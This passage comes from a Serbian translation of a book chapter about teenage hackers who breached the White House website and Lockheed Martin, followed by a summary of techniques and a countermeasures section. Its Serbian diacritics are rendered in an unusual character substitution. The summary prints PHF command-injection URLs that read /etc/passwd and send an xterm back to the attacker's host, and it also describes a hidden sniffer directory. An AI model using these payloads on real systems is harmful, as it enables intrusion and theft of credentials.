ãestocifreni broj koji se meça svakih ãezdeset sekundi. Da bi se prijavili,
ti korisnici moraju da unesu ãestocifreni broj koji je u tom trenutku pri-
kazan na çihovom ureœaju SecureID, i liåni identifikacioni broj, PIN
(koji ponegde dodeàuje kompanija, a nekad ga bira sam korisnik). Web
prezentaciji Bele kuñe promeçena je matiåna strana u isto vreme kada
je na çu provaàeno, kao dokaz da su hakeri bili tu, objasnio je ne0h.
Dao nam je i vezu do upotrebàene strane (slika 2-1).8 Pored simbola
hakerske grupe gLobaLheLL, poruka sadræi i logotip Hong Kong Dan-
ger Duo. To je, kaæe ne0h, laæno ime koje je izmiãàeno kako bi se dodao 41
joã jedan element za obmaçivaçe.

Poglavlje 2: Kad teroristi pozovu

Slika 2-1: Strana kojom je zameçena


Web prezentacija Bele kuñe, maj 1999.

Koliko se ne0h seña, momci odgovorni za ovaj upad na prezentaciju


Bele kuñe nisu bili naroåito ushiñeni ãto su uspeli da upadnu na jednu
od otprilike deset najsigurnijih Web prezentacija u zemài. Bili su “pri-
liåno zauzeti upadaçem svuda”, objasnio je ne0h, “da bi svetu dokazali
da smo najboài”. Umesto opãteg virtuelnog tapãaça po ramenu, on
kaæe da se atmosfera moæe boàe opisati kao: “Dobro obavàen posao,
momci, najzad smo uspeli, ãta je sledeñe?”
Ali nije im ostalo mnogo vremena za bilo kakve druge upade. Njiho-
vi svetovi su se ubrzo sruãili, a taj deo priåe nas ponovo vraña na miste-
rioznog Kalida.
Zyklon, inaåe poznat kao Erik Barns, odavde preuzima priåu. Kaæe
da nikada zaista nije bio ålan grupe gLobaLheLL, ali je visio po IRC
42 prezentacijama s nekim çenim ålanovima. Kako on opisuje dogaœaje,
upad u prezentaciju Bele kuñe postao je moguñ kada je otkrio da je ona
Umeñe provale

mogla biti ugroæena koriãñeçem rupe u programu PHF za pristup tele-


fonskom imeniku postavàenom na Web. To je bila najbitnija slabost ali,
mada su u hakerskoj zajednici znali za çu, “nije je koristilo mnogo àu-
di”, kaæe Zyklon.
Izvodeñi viãe koraka (detaàno su objaãçeni u odeàku Saæetak, kasni-
je u ovom poglavàu), mogao je da zauzme osnovni direktorijum lokaci-
je whitehouse.gov i obezbedi pristup drugim sistemima na lokalnoj
mreæi, ukàuåujuñi server za e-poãtu Bele kuñe. Zyklon je u tom trenut-
ku mogao da presretne poruke izmeœu osobàa Bele kuñe i javnosti,
mada te poruke, naravno, ne bi otkrile nikakve poveràive informacije.
Meœutim, Zyklon je rekao da je mogao i da “doœe do kopije lozinke
i skrivenih datoteka”. Vrãàali su po prezentaciji, gledali ãta mogu da
pronaœu i åekali da àudi poånu da dolaze na posao. Dok je åekao, do-
bio je poruku od Kalida koji mu je rekao da piãe ålanak o nedavnim
upadima i pitao Zyklona da li je nedavno imao akcije o kojima bi govo-
rio. “I onda sam mu rekao da smo upravo upali na Web prezentaciju
Bele kuñe”, ispriåao je Zyklon.
Zyklon mi je rekao da je u roku od par sati çihov program za
prañeçe protoka podataka primeñen – administrator sistema je poku-
ãavao da otkrije ãta se deãava i uœe u trag àudima koji su bili na prezen-
taciji. Puka sluåajnost? Ili je baã tad imao neki razlog da postane
sumçiåav? Proãli su meseci pre nego ãto je Zyklon pronaãao odgovor.
Ali tada, åim je prisluãkivaå otkriven, momci su se povukli s prezentaci-
je i nadali se da su pretekli administratora.
Meœutim, åaånuli su u osiçe gnezdo. Oko dve nedeàe kasnije, FBI
se ustremio na sve ålanove grupe gLobaLheLL koje su mogli da identi-
fikuju. Pored Zyklona – tada je imao 19 godina i uhapãen je u dræavi
Vaãington – uhapãeni su i MostHateD (Patrik Gregori, takoœe 19 godi-
na, iz Teksasa), MidPhasr (Åad Dejvis iz Viskonsina), i drugi.
ne0h je bio meœu par hakera koji su preæiveli napad. Sa bezbedne
udaàene lokacije on je, razjaren, postavio stranu na Web prezentaciju sa
prkosnom porukom. Ona je u prvom trenutku glasila: “Sluãajte vi ga-
dovi iz FBI. Ne z_ se s naãim ålanovima jer ñete izgubiti. Dok ovo pi-
ãem mi dræimo fbi.gov. UPLAÃILI STE SE. Uhapãeni smo jer vaãi
glupi idioti ne mogu da ukapiraju ko je upo u belu kuñu... jel tako? pa 43
ste nas sve uñorkirali da vidite jel ñe neko da ga otkuca. PUNO J_

Poglavlje 2: Kad teroristi pozovu


SREÑE. MI NISMO CINKAROÃI. Kapirate? REKAO SAM DOMI-
NACIJA SVETOM.”
I potpisao je: “Nemilosrdni ne0h.”9

Posledice
Kako se desilo da je administrator sistema tako rano ujutro poåeo da
çuãka? Zyklon se nimalo ne dvoumi oko odgovora. Kada su tuæioci
sakupili dokumente za ovaj sluåaj, pronaãao je izjavu da su informacije
koje su vodile do saznaça vezanih za upad grupe gLobaLheLL u pre-
zentaciju Bele kuñe, dobijene od douãnika FBI-ja. Koliko se on seña, u
dokumentu je pisalo i da se taj douãnik nalazio u Nju Delhiju, u Indiji.
Po Zyklonovom miãàeçu, nije bilo nikakve sumçe. Jedina osoba
kojoj je rekao za upad u Belu kuñu – jedina osoba – bio je Kalid Ibra-
him. Jedan plus jedan jesu dva: Kalid je bio douãnik FBI.
Ali misterija ostaje. Åak i ako je Zyklon u pravu, da li je to cela
priåa? Kalid je bio douãnik, pomagao je FBI-ju da pronaœe klince hake-
re koji su bili raspoloæeni da upadaju na osetàive prezentacije? Ili moæda
postoji joã jedno moguñe objaãçeçe: da je çegova uloga douãnika bila
samo pola priåe, a da je on zapravo bio i pakistanski terorista, kao ãto je
mislio indijski general. Åovek koji igra dvostruku ulogu: pomaæe inte-
resima Talibana dok je infiltriran u FBI.
Njegov strah da ñe ga neki klinac prijaviti FBI-ju uklapa se u ovu
verziju priåe.
Samo nekoliko àudi zna istinu. Pitaçe je da li su meœu çima i
agenti FBI i federalni tuæioci koji su ukàuåeni u sluåaj. Ili su i oni nasa-
mareni?
Na kraju, Patrik Gregori i Åad Dejvis osuœeni su na dvadeset ãest
meseci, a Zyklon Barns na petnaest. Sva trojica su odsluæila kazne i viãe
nisu u zatvoru.

Pet godina kasnije


Dani hakerisaça su za Comradea uglavnom samo señaçe, ali çegov
44 glas æivne kada govori o “uzbuœeçu zbog sr_ koja ne biste smeli da pra-
vite, odlaska na mesta na kojima ne biste smeli da budete, nadajuñi se
da ñete naiñi na neãto kul”.
Umeñe provale

Ipak, vreme je da se poåne sa æivotom. On kaæe da razmiãàa o fakul-


tetu. Kada smo razgovarali, upravo se vratio iz skautske ãkole u Izraelu.
Jezik mu nije bio prevelik problem – uåio je hebrejski u osnovnoj ãkoli
i iznenadio se koliko je mnogo zapamtio.
Njegovi utisci o toj zemài su pomeãani. Devojke su bile “baã super”,
a Izraelci su pokazali da veoma vole Ameriku. “Åini se da se ugledaju na
Amerikance.” Na primer, provodio je vreme s nekim Izraelcima koji su
pili sok RC Cola za koji nikada nije åuo, a ispostavilo se da se pravi u
Americi. Izraelci su objasnili: “To je ono ãto Amerikanci piju u re-
klamama”. Nailazio je i na “antiameriåke stavove àudi koji se ne slaæu sa
ameriåkom politikom”, ali to ga nije omelo: “Pretpostavàam da toga
ima svuda.”
Vreme mu se nimalo nije dopalo – bilo je “hladno i kiãovito” dok je
bio tamo. A onda, bio je tu i problem s raåunarima. Zbog puta je kupio
prenosivi raåunar i beæiånu mreænu karticu, ali je otkrio da su “zgrade
napravàene od ogromnog kameça”. Njegov raåunar je mogao da vidi
pet ili deset mreæa, ali su signali bili previãe slabi za povezivaçe i morao
je da peãaåi dvadeset minuta da bi doãao do mesta na kom se moæe pri-
javiti na mreæu.
Comrade je sada u Majamiju. Tinejdæer s dosijeom prestupnika sada
æivi od nasledstva i pokuãava da odluåi da li ñe iñi na fakultet. Ima dva-
deset godina i uglavnom ne radi niãta.
Comradeov drugar ne0h radi za veliku telekomunikacionu kompa-
niju (kaæe da posao s radnim vremenom od devet do pet “nije dobar”),
ali ñe uskoro otiñi u Los Anœeles na tri meseca fiziåkog rada jer plañaju
mnogo viãe nego ãto sada zaraœuje. Nada se da ñe, kao i veñina obiånih
àudi, uspeti da uãtedi dovoàno za otplañivaçe kuñe u kojoj trenutno æivi.
Kada se tromeseåni, dobro plañen posao zavrãi, i ne0h razmiãàa o
studiraçu – ali ne planira da studira raåunarske nauke. “Veñina àudi s
takvim diplomama koje sam sreo nema pojma”, rekao je. Umesto toga,
on bi voleo da studira poslovni i organizacioni menadæment, a onda da
se raåunarima bavi na poslovnom nivou.
Govoreñi o svojim ranijim avanturama, on ponovo pomiçe svoju
okupiranost Kevinom. Do koje mere je zamiãàao da ide mojim stopama?
Da li sam æeleo da budem uhvañen? I jesam i nisam. Ako me 45
uhvate, to bi bio dokaz da “mogu to da uradim i da sam to
uradio”. Nije baã da sam namerno hteo da me uhvate. Hteo

Poglavlje 2: Kad teroristi pozovu


sam da me uhvate da bih se borio, oslobodio i onda bio haker
koji je umakao. Izaãao bih, naãao dobar posao u nekoj vladi-
noj agenciji i uklopio bih se s podzemàem.

Koliko je pretça velika


Kombinacija odluånih terorista i neustraãivih klinaca hakera mogla bi
biti katastrofalna za Ameriku. Ova priåa me je naterala da se zapitam
koliko drugih Kalida regrutuje klince (ili nepatriotski nastrojene odra-
sle sa hakerskim sposobnostima), gladne novca, priznaça ili zadovoà-
stva za uspeãno obavàene teãke zadatke. Vrbovnici posle Kalida moæda
ñe biti tajanstveniji i neñe se moñi tako lako otkriti.
Kada sam bio u pritvoru pre suœeça, nekoliko puta mi je prilazio
kolumbijski kraà droge. Sledovala mu je doæivotna robija u federalnom
zatvoru bez moguñnosti uslovne kazne. Ponudio mi je primamàiv po-
sao: platiñe mi 5 miliona dolara u gotovom za upad u “Sentry” – raåu-
narski sistem Federalnog biroa za zatvore – i çegovo oslobaœaçe iz
zatvora. Taj tip je bio stvaran i smrtno ozbiàan. Nisam prihvatio çego-
vu ponudu, ali sam ostavio utisak da ñu mu pomoñi kako bih izbegao
sukob. Pitam se ãta bi ne0h uradio u sliånoj situaciji.
Ameriåki neprijateài moæda treniraju svoje vojnike za kompjutersko
ratovaçe kojim bi napali ameriåku infrastrukturu i odbranili svoju. Ne
morate biti mudrac da biste shvatili da takve grupe mogu angaæovati
umeãne hakere iz bilo kog dela sveta radi obuke, ili za projekte koji su
bitni za misije.
Godine 1997. i ponovo 2003, Ministarstvo odbrane je pokrenulo
operaciju Eligible Receiver – pokuãaj da se proveri osetàivost nacije na
elektronski napad. U ålanku Washington Timesa10 o ranijem ovakvom
pokuãaju, objavàeno je: “Viãi rukovodioci Pentagona bili su zapaçeni
vojnom veæbom koja je pokazala koliko je hakerima lako da obogaàe
ameriåke vojne i civilne raåunarske mreæe”. Ålanak objaãçava da je
Agencija za nacionalnu bezbednost okupila grupu svojih specijalista za
raåunare u “crveni tim” hakera i omoguñila im da koriste samo raåu-
narsku opremu koja je dostupna i javnosti, i sve alate za hakerisaçe,
ukàuåujuñi kôd za zloupotrebe koji su mogli preuzeti sa Interneta ili
46 elektronskih oglasnih tabli.
Za nekoliko dana, hakeri iz crvenog tima infiltrirali su se u raåunar-
Umeñe provale

ske sisteme za upravàaçe delovima nacionalne elektrodistribucijske


mreæe i pomoñu nekoliko komandi mogli su da zamraåe åitave delove
zemàe. “Da ovo nije bila veæba”, objavio je Christian Science Monitor,
“oni su mogli da poremete sistem komunikacije Ministarstva odbrane (i
preuzmu najveñi deo Pacifiåke komande) i pristupe raåunarskim si-
stemima na brodovima ameriåke mornarice.”11
Liåno sam mogao da pobedim bezbednosne mehanizme telefonskih
centrala napravàenim u kompaniji Baby Bells i kontroliãem pristup tim
centralama. Pre deset godina imao sam potpunu kontrolu nad veñinom
centrala koje su odræavale kompanije Pacific Bell, Sprint, GTE i druge.
Zamislite haos koji bi snalaæàiva grupa terorista mogla da napravi kada
bi imala takav pristup.
Ålanovi organizacije Al Kaida i drugih teroristiåkih grupa i ranije su
koristile raåunarske mreæe pri planiraçu teroristiåkih napada. Postoje
dokazi da su teroristi koristili Internet prilikom planiraça operacija za
napade 11. septembra.
Ako je Kalid Ibrahim i bio uspeãan u dobijaçu informacija preko
pomenutih hakera, to niko ne obelodaçuje. Nedostaje konaåan dokaz
da je on zaista bio povezan s napadima na Svetski trgovinski centar i
Pentagon. Ipak, niko ne zna da li ñe se on ili neko sliåan ponovo pojavi-
ti na kibernetiåkoj sceni, traæeñi naivne pomagaåe koje uzbuœuje “pra-
vàeçe sr_ koja ne biste smeli da pravite, odlazak na mesta na kojima ne
biste smeli da budete”. Klince koji bi mogli pomisliti da je ponuœeni
izazov “kul”.
Za mlade hakere, slaba bezbednost ostaje neprekidan podsticaj. Pa
ipak, hakeri iz ove priåe trebalo je da prepoznaju opasnost kada ih je
strani dræavàanin regrutovao za kompromitovaçe osetàivih ameriåkih
raåunarskih mreæa. Moram se zapitati koliko ñe drugih mladiña kao ãto
je ne0h neprijateà regrutovati.
U svetu punom terorista, dobra bezbednost nikada nije bila toliko
bitna kao danas.

SAÆETAK
ne0h nam je dao detaàe o naåinu na koji je upao u raåunarski sistem 47
Lockheed Martina. Priåa je svedoåanstvo o inovativnosti hakera (“Ako
u bezbednosti postoji rupa, mi ñemo je pronañi” mogao bi biti hakerski

Poglavlje 2: Kad teroristi pozovu


moto), ali i upozoreçe za svaku organizaciju.
ne0h je brzo utvrdio da Lockheed Martin ima sopstveni server za
prevoœeçe imena domena (engl. Domain Name Servers, DNS). DNS
je Internet protokol koji, na primer, www.disney.com prevodi u
198.187.189.55, adresu koja se moæe koristiti za usmeravaçe paketa s
porukama. ne0h je znao da je grupa za istraæivaçe bezbednosti u Poà-
skoj objavila ono ãto hakeri nazivaju “exploit” – program koji je dizajni-
ran tako da napadne jedan konkretan raçiv deo – da iskoristi slabost u
verziji DNS-a kompanije Lockheed.
Kompanija je koristila DNS protokol pod imenom BIND (Berkeley
Internet Name Domain). Poàska grupa je otkrila da je jedna verzija
BIND-a slaba kada napad ukàuåuje “prelivaçe udaàenog bafera” (engl.
remote buffer overflow), a upravo tu verziju imala je kompanija Lock-
heed Martin. Prateñi metodu koju je pronaãao na Internetu, ne0h je
mogao da doœe do administratorskih privilegija i na primarnom i na se-
kundarnom DNS serveru Lockheeda.
Posle zauzimaça administratorskog naloga, ne0h je podesio presre-
taçe lozinki i e-poãte instalirajuñi program za çuãkaçe. U tajnosti je
hvatao sav saobrañaj. Podatke koje treba uskladiãtiti, haker obiåno ãaàe
na mesto gde je mala verovatnoña da ñe biti primeñeni. Da bi sakrio
dnevnik prisluãkivaça, ne0h je napravio direktorijum sa imenom koje
je bilo samo razmak, predstavàen s tri taåke. Prava putaça koja je ko-
riãñena bila je “/var/adm/ ...” Tokom inspekcije administrator sistema
mogao je lako da previdi ovu bezopasnu stavku.
Tehnika sakrivaça programa za çuãkaçe, mada je u mnogim situ-
acijama efikasna, priliåno je jednostavna. Za prikrivaçe hakerskih tra-
gova u ovakvim situacijama postoje i prefiçenije metode.
Pre nego ãto je otkrio da li ñe moñi dubàe da prodre u mreæu Lock-
heed Martina kako bi doãao do poveràivih informacija, ne0h je obratio
paæçu na drugi zadatak, pa su osetàive datoteke kompanije ostale bez-
bedne.
Za upad u Belu kuñu, Zyklon kaæe da je prvo pokrenuo program
CGI Scanner koji pregleda ciàni sistem traæeñi slabosti standardnog in-
terfejsa za prenos. Otkrio je da je Web prezentacija podloæna napadu
48 pomoñu “zloupotrebe PHF-a”. Ona koristi greãku koju je napravio pro-
gramer PHF skripta (telefonskog imenika).
Umeñe provale

PHF je okruæeçe zasnovano na obrascima. Ono prihvata ime kao


unos i na serveru traæi podatke o imenu i adresi. Skript poziva funkciju
escape_shell_cmd(), koja bi trebalo da oåisti unos od sumçivih znako-
va. Ali, programer je sa liste izostavio jedan znak – znak za novi red. Vr-
stan napadaå mogao bi iskoristiti taj previd tako ãto ñe unos postaviti u
obrazac koji sadræi ãifrovanu verziju (0x0a) znaka za novi red. Slaçe
znakovnog niza sa ovim znakom prevariñe skript tako da izvrãi svaku
komandu koju napadaå odabere.
Zyklon je u svoj åitaå Weba uneo URL
http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/bin/
cat%20/etc/passwd
Tako je mogao da prikaæe datoteku s lozinkama za whitehouse.gov.
Meœutim, on je hteo potpunu kontrolu nad Web serverom Bele kuñe.
Gotovo sigurno je znao da ñe ulazi X Servera biti blokirani zaãtitnom
barijerom, te da neñe moñi da se poveæe ni sa jednim od tih servisa na
prezentaciji whitehouse.gov. Zato je ponovo iskoristio rupu u PHF-u
tako ãto je uneo:
http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/usr/X11R6/
bin/xterm%20-ut%20-display%20zyklons.ip.address:0.0
Tako je terminalski emulator xterm poslat sa servera Bele kuñe na
raåunar koji je on kontrolisao i na kom je radio X server. Drugim reåi-
ma, umesto da se poveæe sa whitehouse.gov, on je sistemu Bele kuñe na-
redio da se poveæe sa çim. (To je moguñe samo kada barijera dozvoàava
izlazne veze, ãto je ovde oåigledno bio sluåaj.)
Potom je iskoristio slabost prelivaça bafera u programu sistema –
ufsrestore. Zyklon kaæe da mu je to omoguñilo da zadobije administra-
torska prava na prezentaciji whitehouse.gov, i pristup serveru za poãtu
Bele kuñe i ostalim sistemima na mreæi.

PROTIVMERE
Opisane zloupotrebe koje su pravili ne0h i Comrade pred sve kompani-
je postavàaju dva problema.
Prvi je jednostavan i opãte poznat: informisaçe o svim najnovijim
izdaçima operativnog sistema i programa. Izuzetno je vaæno biti u toku 49
i instalirati bezbednosne zakrpe ili ispravke. Da biste bili sigurni da se
to ne radi nasumice, trebalo bi da osmislite i sprovodite program aæuri-

Poglavlje 2: Kad teroristi pozovu


raça åiji bi cià bio upozoravaçe odgovarajuñeg osobàa åim se pojavi
nova dopuna proizvoda koje kompanija koristi – naroåito operativnog
sistema, ali i aplikacionog softvera i firmvera.
Kada nova zakrpa postane dostupna, ona se mora ãto pre instalirati
– odmah, ili åim bude moguñe. Nije teãko razumeti premorene zaposle-
ne koji su pod stalnim pritiskom obavàaça obiånih zadataka (instalira-
çe sistema za nove radnike, na primer) i instaliraça zakrpa u dogledno
vreme. Meœutim, ukoliko je ureœaj s nepotpunim softverom dostupan
preko Interneta, nastaje veoma riziåna situacija.
Brojni sistemi su ugroæeni zbog neredovnog aæuriraça. Åim se neka
slabost objavi, prozor izloæenosti je maksimalno otvoren sve dok proiz-
voœaå ne objavi zakrpu koja ñe popraviti problem, i dok je korisnici ne
instaliraju.
Vaãa organizacija treba tom zadatku da dâ visok prioritet. Mora
postojati zvaniåan program upravàaça zakrpama koji smaçuje izlo-
æenost ãto je moguñe bræe, ali tako da se ne ometaju osnovne operacije
poslovaça.
Ipak, åak i ako redovno instalirate zakrpe, to nije dovoàno. ne0h
kaæe da su neki upadi u kojima je uåestvovao bili zloupotrebe “nultog
dana” (engl. zero day) – upadi zasnovani na slabosti koja je poznata
samo u okviru male grupe hakera. “Nulti dan” je dan kada prvi put is-
koriste tu slabost, a to je ujedno i dan kada proizvoœaå i àudi koji se
bave bezbednoãñu saznaju za çu.
Poãto uvek postoji moguñnost takvih upada, svaka organizacija koja
koristi loã proizvod raçiva je sve dok se ne objavi zakrpa ili zaobilazno
reãeçe. Kako da smaçite rizik od takve izloæenosti?
Verujemo da je jedino vredno reãeçe koriãñeçe modela “dubinske
odbrane”. Moramo pretpostaviti da ñe naãi raåunarski sistemi koji su
dostupni javnosti u nekom trenutku biti raçivi na nulti dan. Zbog toga
treba da stvorimo okruæeçe za smaçivaçe potencijalne ãtete koju loãi
momci mogu da naprave. Jedan primer, koji smo ranije pomenuli, jeste
postavàaçe javno dostupnih sistema u “DMZ” zaãtitne barijere kom-
panije. Termin DMZ je pozajmàen iz vojnopolitiåke skrañenice za “de-
50 militarizovanu zonu” i odnosi se na podeãavaçe arhitekture mreæe tako
da sistemi koji su dostupni javnosti (Web serveri, serveri e-poãte, DNS
Umeñe provale

serveri i sliåno) budu izolovani od osetàivih sistema u mreæi kompanije.


Primeçivaçe arhitekture koja ãtiti unutraãçu mreæu jedan je primer
“dubinske odbrane”.
Takvim rasporedom, åak i ako hakeri otkriju dotad nepoznatu slabost
i dospeju do Web servera ili servera e-poãte, korporativni sistemi u unu-
traãçoj mreæi i daàe ñe biti zaãtiñeni dodatnim bezbednosnim slojem.
Kompanije mogu organizovati joã jednu efikasnu protivmeru
prañeçem mreæe ili pojedinaånih matiånih raåunara u potrazi za neuo-
biåajenim ili sumçivim aktivnostima. Napadaå obiåno izvodi odreœene
akcije kada uspeãno upadne u sistem – na primer, pokuãava da doœe do
ãifrovanih ili obiånih tekstualnih lozinki, instalira zadça vrata, meça
konfiguraciju datoteka kako bi oslabio bezbednost, ili meça sistemske,
programske ili dnevniåke datoteke.
Prañeçem tih vrsta uobiåajenog hakerskog ponaãaça i uzbuçi-
vaçem odgovarajuñeg osobàa, lakãe ñete kontrolisati ãtetu.
Drugo: nebrojeno puta su me novinari pitali koji je najboài naåin
zaãtite poslovnog ili liånog raåunara u danaãçem neprijateàskom
okruæeçu. Jedna od osnovnih preporuka jeste koriãñeçe jaåeg vida
identifikovaça umesto statiånih lozinki. Nikada neñete znati, osim
moæda kada sve bude gotovo, da li neko drugi zna koja je vaãa lozinka.
Uz tradicionalne lozinke moæete koristiti brojne tehnike prijavài-
vaça na drugom nivou, koje omoguñavaju mnogo veñu sigurnost. Po-
red ranije pomenutog RSA SecureID-a, Safeword PremierAccess nudi
æetone za generisaçe lozinke, digitalne sertifikate, smart kartice, bio-
metriku i druge tehnologije.
Nedostaci ove vrste kontrolisaça identiteta jesu dodatni troãkovi i
neprijatnosti za svakog korisnika. Sve zavisi od toga ãta pokuãavate da
zaãtitite. Statiåne lozinke su moæda dovoàne za zaãtitu novih ålanaka
Web prezentacije LA Timesa. Ali, da li se na çih moæete osloniti kada
treba da zaãtitite specifikacije dizajna novog putniåkog mlaznog aviona?

ZAKLJUÅAK
Priåe u ovoj kçizi ali i novinski ålanci, prikazuju koliko su ameriåki
raåunarski sistemi, a i sama nacija, podloæni napadu. Åini se da je ve-
oma malo sistema zaista bezbedno. 51
U eri terorizma, jasno je da se rupe moraju boàe krpiti. Epizode kao
ãto je ova, pokreñu pitaçe s kojim se moramo suoåiti: koliko lako se ta-

Poglavlje 2: Kad teroristi pozovu


lenat i znaje nesavesnih tinejdæera mogu okrenuti protiv nas i ugroziti
ameriåko druãtvo. Verujem da se joã u osnovnoj ãkoli – åim se œaci su-
sretnu sa informatikom – mora uåiti o principima raåunarske etike.
Nedavno sam prisustvovao prezentaciji Frenka Abignejla, protagoni-
ste filma Uhvati me ako moæeã (Catch Me If You Can). Frenk je sproveo
istraæivaçe o etiåkoj upotrebi raåunara meœu uåenicima sredçih ãkola
ãirom zemàe. Svaki uåenik je bio upitan da li je provaàivaçe lozinke
ãkolskog druga prihvatàivo ponaãaçe. Iznenaœuje da åak åetrdeset osam
procenata ispitanih studenata smatra da je to u redu. S takvim stavovima
nije teãko shvatiti zaãto àudi uåestvuju u ovakvim aktivnostima.
Ukoliko neko ima predlog kako da mladi hakeri budu maçe pod-
loæni regrutovaçu od strane neprijateàa, domañih i stranih, bilo bi do-
bro da nam saopãti svoje ideje.

NAPOMENE
1. “Do Terrorists Troll the Net?”, Niall McKay, wired.com, 14. novembar, 1998.
2. Makajev ålanak, op. cit.
3. Makajev ålanak, op. cit.
4. Sa Web prezentacije satp.org, South Asia Intelligence Review.
5. “The United States and the Global Coalition Against Terrorism, September-
December 2001: A Chronology”, http://www.state.gov/r/pa/ho/pubs/fs/
5889.htm.
6. Obrañaçe general-majora Yashwanta Devaa, Avsm (Retd), President lete,
na temu “Information Security” u Indijskom meœunarodnom centru (India In-
ternational Centre), Nju Delhi, 6. april 2002, strana 9.
7. Ovo je teãko potvrditi. Poãto se napad dogodio za vreme Klintonove admi-
nistracije, nijedna od navedenih osoba viãe ne radi u Beloj kuñi. Ali dostupno
je nekoliko sitnica. Monti Hejms je pravio video-snimak. Kristofer Adams je
ime reportera britanskog åasopisa Financial Times; koliko nam je poznato, u
Beloj kuñi nije bilo zaposlenog s tim imenom. Debra Rid je fotograf Associated
Pressa. Nismo pronaãli nikoga sa imenom Koni Kolabatisto ko je radio u Beloj
kuñi. Æena s tim imenom udata je (ili je bila u to vreme) za Dæina Kolabatista,
koji je bio predsednik odeàeça Solutions u kompaniji Space Imaging, ali
nema oåigledne veze izmeœu çih i tima u Beloj kuñi.
8. http://www.attrition.org/mirror/attrition/1999/05/10/www.white-
house.gov/mirror.html.
9. I ovde je teãko proveriti verodostojnost. Ipak, tekst koji je naveden moæe
52 se videti na lokaciji http://www.attrition.org/mirror/attrition/1999/05/26/
mmic.snu.ac.kr/.
10. “Computer Hackers Could Disable Military; System Compromised in Se-
Umeñe provale

cret Exercise”, Bil Gerc, Washington Times, 16. april, 1998.


11. “Wars of the Future... Today”, Tom Regan, Christian Science Monitor, 24.
jun, 1999.